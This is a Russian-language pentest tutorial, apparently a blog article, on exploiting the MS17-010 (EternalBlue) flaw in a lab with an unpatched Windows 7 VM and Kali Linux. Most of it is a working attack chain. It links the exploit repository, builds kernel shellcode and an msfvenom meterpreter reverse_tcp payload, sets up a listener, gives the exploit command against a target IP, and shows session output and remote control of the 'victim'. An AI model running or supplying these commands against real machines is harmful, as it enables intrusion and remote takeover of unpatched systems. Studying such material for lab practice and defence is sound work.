Данная уязвимость использовалась при распространении вредоносного ПО WannaCry в мае 2017 года, а также при распространении Petya в июне 2017 года. Уязвимости были подвержены операционные системы от Windows XP до Windows Server 2016.

Нам понадобятся две виртуальных машины: первая машина Windows 7 x32, без заплатки kb4012212, вторая Kali Linux

Код эксплоита можно скачать здесь: https://github.com/3ndG4me/AutoBlue-MS17-010

Затем на Kali открываем два терминала, в первом готовим и запускаем на прослушивание порта модуль метерпретера:

cd AutoBlue-MS17-010-master/shellcode
nasm -f bin eternalblue_kshellcode_x86.asm -o sc_x86_kernel.bin
msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.189.130 LPORT=4444
cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin

Во втором компилируем и готовим сам эксплоит:

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set EXITFUNC thread
set LHOST 192.168.189.130
show options
exploit -j
jobs

Затем в первой консоли командой

python eternalblue_exploit7.py 192.168.189.133 ./shellcode/sc_x86.bin

пытаемся проэксплуатировать уязвимость.

Иногда в процессе попытки эксплуатации виртуальная машина Windows 7 падает с синим экраном, будьте к этому готовы, иногда приходится запустить вышеприведенную команду несколько раз, прежде чем произойдет удачная эксплуатация уязвимости.

В случае удачного подключения машины жертвы к машине злоумышленника, во второй консоли отобразится что-то наподобии этого:

*] Sending stage (175174 bytes) to 192.168.189.133
[*] Meterpreter session 

<SESSION_NUMBER>

opened (192.168.189.130:4444 -> 192.168.189.133:49160 ) at 2022-10-01 03:38:26 -0400

После этого, в этой консоли можно ввести sessions -i <SESSION_NUMBER>, тем самым подключиться к сессии и начать управление удаленным компьютером, например командой screenshot можно сделать скриншот на компьютере жертвы. Список всех доступных команд можно получить командой help.

Статья написана с целью более глубокого погружения в тему пентеста, простые и очевидные команды пропущены.